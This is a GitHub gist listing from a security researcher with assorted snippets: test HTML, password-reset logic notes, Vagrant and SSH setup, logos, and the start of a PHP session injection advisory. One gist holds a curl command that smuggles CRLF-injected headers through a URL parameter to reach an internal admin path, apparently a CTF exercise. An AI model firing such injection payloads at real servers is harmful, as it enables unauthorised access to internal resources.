Skip to content

Instantly share code, notes, and snippets.

View pwnedDesal's full-sized avatar
🥔
ing circa '60

Adrian Belen pwnedDesal

🥔
ing circa '60
27 followers · 101 following
View GitHub Profile
@pwnedDesal
pwnedDesal / test.html
Last active August 29, 2015 14:25
<pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre><pre>pre>
</pre?
include
echo "text";
<!--
include 'config.php';
include 'classes.php';
$action = (isset($_REQUEST['action'])) ? $_REQUEST['action'] : 'View';
$param = (isset($_REQUEST['param'])) ? $_REQUEST['param'] : 'index';
@pwnedDesal
pwnedDesal / test1.html
Last active August 29, 2015 14:26
<html>
<script>
var a='aa' b='sss'
</script>
</html>
@pwnedDesal
pwnedDesal / ok
Last active August 29, 2015 14:26
tess asdasd
sdsad asdasda
asdasdasdasdasdasdasd
erer errerer
@pwnedDesal
pwnedDesal / flow
Created August 1, 2015 04:55
if (user is log in){
//the app will not use auth parameter which is a reset password passcode. Then change the password of the user who is currently log in.
}
else{
//if the user is not log in ,oculus uses the auth parameter to identify which account to be reset.
}
@pwnedDesal
pwnedDesal / curl.html
Created August 4, 2015 00:32
DeAdCaT-2:tmp DeAdCaT___$ curl http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=127.0.1.1%2F188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/%20HTTP/1.1%0aHost:%20hackme%0aRange:%20bytes=80-%0a%0a
<html>
<head>
<style type="text/css">
body { margin:0; }
* { font-family:fantasy; }
p { height:50pt; font-size:50pt; background:green; }
input[type=text] { width:500; font-size:15pt; }
input[type=submit] { width:150; font-size:15pt; }
input[type=submit]:hover { background:lightblue; }
@pwnedDesal
pwnedDesal / vagrant
Last active November 8, 2016 08:31
# -*- mode: ruby -*-
# vi: set ft=ruby :
# All Vagrant configuration is done below. The "2" in Vagrant.configure
# configures the configuration version (we support older styles for
# backwards compatibility). Please don't change it unless you know what
# you're doing.
Vagrant.configure(2) do |config|
# The most common configuration options are documented and commented below.
# For a complete reference, please see the online documentation at
@pwnedDesal
pwnedDesal / hackerone.svg
Created May 29, 2016 06:06
logo for hackerone
<svg width="39px" height="74px" viewBox="0 0 39 74" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancoding.com/sketch/ns">
<!-- Generator: Sketch 3.4.2 (15855) - http://www.bohemiancoding.com/sketch -->
<title>Untitled 3</title>
<desc>Created with Sketch.</desc>
<defs>
<path id="path-1" d="M0.06,3.60329081 C0.212928399,2.89925466 0.657587482,2.30266801 1.387,1.823 C2.307,1.223 3.497,0.915 4.958,0.915 C6.357,0.915 7.547,1.223 8.535,1.823 C9.523,2.44 10.014,3.219 10.014,4.183 L10.014,70.051 C10.014,70.887 9.499,71.652 8.486,72.35 C7.467,73.056 6.295,73.407 4.958,73.407 C3.559,73.407 2.387,73.056 1.436,72.35 C0.673931664,71.7899832 0.215600576,71.1951631 0.06,70.5544658 L0.06,3.60329081 L0.06,3.60329081 Z"></path>
<path id="path-3" d="M0.787,9.392 C0.187,9.954 -0.071,10.807 0.04,11.974 C0.143,13.13 0.677,14.23 1.623,15.268 C2.573,16.313 3.635,16.968 4.85,17.246 C6.046,17.517 6.955,17.369 7.555,16.813 L12.
@pwnedDesal
pwnedDesal / bugcrowds.svg
Last active May 29, 2016 06:08
bugcrowds.svg
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@pwnedDesal
pwnedDesal / gist:09347373da94befa37b2e255805ef5cd
Created August 5, 2016 01:31
ssh in windows
The **S**ecure **Sh**ell ("SSH") protocol is all about security and Vagrant is prepackaged with an SSH key. Unfortunately, PuTTY is not compatible with OpenSSH, out-of-the-box. Consequently, PuTTY will **not** recognize the `insecure_private_key` (which is in OpenSSH format) provided by Vagrant as a valid, private key.
>The file is named `insecure_private_key` only because it is not very *private*, in that it is publicly available, because it ships with Vagrant. You can regain the security offered by the SSH protocol by creating your own SSH key pair and editing the [Vagrantfile](http://docs.vagrantup.com/v2/vagrantfile/ssh_settings.html), accordingly.
A workaround is to use [PuTTYgen](http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html) (a free, open-source RSA and DSA key generation utility) to import and convert the `insecure_private_key` into PuTTY's format (a `.ppk` file). To do so, simply:
1. Open the PuTTYgen utility;
1. Click on the `Load` button;
1. Navigate to the `...\.vagrant.d\` fold
@pwnedDesal
pwnedDesal / .md
Created August 19, 2016 06:54 — forked from chtg/.md
PHP Session Data Injection Vulnerability

#PHP Session Data Injection Vulnerability

Taoguang Chen <@chtg57> - Write Date: 2016.7.27 - Release Date: 2016.8.18

PHP's session php/php_binary handlers wrongly handles the session name cause arbitrarily session data injection.

Affected Versions

Affected is PHP 5 < 5.6.25
Affected is PHP 7 < 7.0.10